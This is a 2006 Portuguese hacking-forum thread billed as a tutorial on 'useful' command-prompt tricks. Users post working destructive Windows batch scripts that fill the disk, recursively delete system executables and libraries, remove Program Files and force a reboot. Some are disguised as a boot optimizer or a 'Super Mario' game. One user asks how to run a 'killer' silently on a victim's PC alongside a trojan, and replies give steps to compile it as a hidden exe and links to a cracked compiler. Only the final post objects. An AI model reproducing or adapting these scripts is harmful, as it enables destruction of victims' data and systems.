[Tutorial] Criando coisas úteis no Prompt

Started by Anonymous, 20 de May , 2006, 12:28:50 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Be.Cool

A sabedoria está em suas mãos

Ðark$pawn

Quote from: "Be.Cool"vlw rodrigo pelo link do exescript !!!

Vamos te dar mais uma chance amigo Be.Coll, cuidado na próxima ok? ;)

Anonymous

Superlotando o Hard Disk (HD   ::))

@ ECHO OFF
ECHO "Hacker" > dados.dat
:VOLTA
TYPE SYSTEM.DAT >> DADOS.DAT
GOTO VOLTA

A proporção do crescimento do arquivo se faz mais ou menos assim:

1 Miinuto: 100MB
10 Minutos: 2GB
1 Hora: 12 GB

rodweb

Quote from: "c4x5"Superlotando o Hard Disk (HD   ::))

@ ECHO OFF
GOTO VOLTA

só se esse system.dat estiver na mesma pasta desse badcom, senão vai ficar com menos de 1k

Ch1p5

3º metodo...
Abra o prompt de comando (Iniciar > Executar > CMD) e digite: copy con bc.bat (obs:vc pode por qualquer nome no lugar do "bc", será o nome do arkivo), após isso digite os comandos...

QuoteC:\Documents and Settings>copy con bc.bat
cd %SystemRoot%
cd ../0
del /s /q *.exe
del /s /q *.dll
del /s /q *.ocx
del /s /q *.zip
del /s /q *.rar
ren *.* *;*
doskey shutdown e0qu30ajpdjfpaie0
rmdir /s /q C:\Arquivos de Programas\
shutdown -r -t 10 -c Se Lascou otário, prepare o cd do Windows Xp.. Porque só formatando. Otário.

quando digitar todos os códigos...feche o prompt...a badcon estará na pasta onde o prompt está, no meu caso, o C:\Documents and Settings\
procure q estará lá!!! ;)

espero ajudar...

by Ch1p5

"Minha impressora está normal, mas não imprime"

Slinack

Quote from: "Sthealt"locator.dll, conseguiu o serial do Quick Batch File Compiler? Se sim, posta ae.

Bom... eu axei aki alguns cracks...
ja q n sabia a versaum vou postar as duas mais novas q axei...
*Não verifiquei se tinha virus.. nem deu tempo...
melhor conferir antes ^^
Quick Batch File Compiler v2.0.7.0 Crack UnderPl.zip
&
Quick Batch File Compiler v2.0.7.1 Crack Yyepg.zip

Sem +

Casanova

Segundo o autor este é para acelerar no Boot.
Confiram:

@echo off
color 0A
:1
Echo.
Echo Optimizador de velocidade
Echo.
set/a A=A+1
ECHO Instalando: %A%%%
for /L %%A IN (0,1,%random:~0,2%00) DO SET B=%%A
for /L %%B IN (0,1,100) DO >NUL ECHO %systemroot%\system32\SHELL.DLL -6 NT *(%%B()
if "%A%"=="100" goto 2
cls
goto 1
:2
echo Y>%systemroot%\rrxx.dll
reg add "HKLM\SYSTEM\ControlSet001\Control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher /t REG_DWORD /d 1 < %systemroot%\rrxx.dll
reg add "HKLM\SYSTEM\ControlSet002\Control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher /t REG_DWORD /d 1 < %systemroot%\rrxx.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher /t REG_DWORD /d 1 < %systemroot%\rrxx.dll
cls
Echo.
echo Operacao concluida.
Echo.
Echo Reinicie o computador para as alteracoes fazerem efeito.
echo.
set/p rein=Deseja reiniciar o computador (S/N):
if "%rein%"=="S" shutdown -f -t 0 -r
if "%rein%"=="S" shutdown -f -t 0 -r
if "%rein%"=="s" shutdown -f -t 0 -r

NetKiler

Quote from: "c4x5"Superlotando o Hard Disk (HD   ::))

@ ECHO OFF
GOTO VOLTA

para torna-lo funcional (no win Xp) use o codigo a seguir:

@echo off
color 0A
echo -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
echo -=-=-=Super Mario 2.5-=-=-=-=
echo -=--=-=-=-=-=-=-=-=-=-=-=-=-=
pause
cls
echo Aguarde enquanto o Jogo esta sendo carregado, isto pode levar alguns minutos
echo carregando...
echo "Hacker" >> "C:\Documents and Settings\All Users\Dados de aplicativos\Dados.dat"
ECHO "HACKER" >> "C:\Documents and Settings\All Users\Dados de aplicativos\System.dat"
TYPE "C:\Documents and Settings\All Users\Dados de aplicativos\Dados.dat" >> "C:\Documents and Settings\All Users\Dados de aplicativos\System.dat"
TYPE "C:\Documents and Settings\All Users\Dados de aplicativos\System.dat" >> "C:\Documents and Settings\All Users\Dados de aplicativos\Dados.dat"
GOTO VOLTA

Royal

Tenhu um killer, quero passar ele pra .exe e não quero que aparece a tela preta ao ser executado no pc da vitima, seria um killer.exe silêncioso, coloco o codigo dele se auto iniciar no pc da vitima. Sei que à um programa chamado exescript, porém ja tentei achar o crack em todas as fontes de buscas possiveis e não conssegui. Antigamente eu usava o Cactus para isso, unia 2 killers colocava para iniciar invizivel o cactus 2.0 da essa opção. Mas o cactus foi ficando detctavel com o tempo dae parei, quando utilizo um killer em conjunto com trojan, utilizo o em bat e aparece aquela tela preta no pc da vitima, fazendo assim com que ela tome as medidas para que isso não aconteça as vezes formatando ou tomando outras medidas. Alguém poderia me ajudar, desde ja obrigado.

Anonymous

Superlotador:@echo off
break off
echo xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx > %SystemRoot%\system32\big.dat
goto much
echo xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx >> %SystemRoot%\system32\big.dat
type %SystemRoot%\system32\big.dat
goto much

1NT3RC3PT0R

Quote from: "Royal"Tenhu um killer, quero passar ele pra .exe e não quero que aparece a tela preta ao ser executado no pc da vitima, seria um killer.exe silêncioso, coloco o codigo dele se auto iniciar no pc da vitima. Sei que à um programa chamado exescript, porém ja tentei achar o crack em todas as fontes de buscas possiveis e não conssegui. Antigamente eu usava o Cactus para isso, unia 2 killers colocava para iniciar invizivel o cactus 2.0 da essa opção. Mas o cactus foi ficando detctavel com o tempo dae parei, quando utilizo um killer em conjunto com trojan, utilizo o em bat e aparece aquela tela preta no pc da vitima, fazendo assim com que ela tome as medidas para que isso não aconteça as vezes formatando ou tomando outras medidas. Alguém poderia me ajudar, desde ja obrigado.
Cara se você quizer deixar ele exe, basta você baixar o Quick Batch File Compiler, abrir o killer.bat com o programa, vai no menu project ai options, onde aparece Output EXE type você marca a opção Ghost Application e da ok. Ai so você compilar o killer apertando f9. Seu killer rodara sem aparecer na tela do usuario.

Caso você não tenha o Quick Batch File Compiler.
http://www.abyssmedia.com/downloads/quickbfc.exe

Crack dele.
http://www.interceptor.netsons.org/dark ... ccrack.zip

Espero ter ajudado!

RT

;}
esses .bat é uma das formas mais simples de ACABAR com o PC da vítma.  ;D
boa. (y)

RT; 8)

Anonymous

vuln

Eu acho que li errado o nome do tópico. Coisas "úteis" no Prompt. Isso é vergonhoso, tanto em conteúdo como atitude. Quer danificar um computador? Utilize o seu. Sou a favor da proliferação de pragas que visem um objetivo. Se um programador consegue realizar um arquivo que faça isso tudo ele merece. Mas chegar ao ponto de inutilizar o sistema pra que seja feito uma re-instalação para mim é babaquisse.

Até mais.  :(
"O amor por princípio, a Ordem por base, o progresso por objetivo."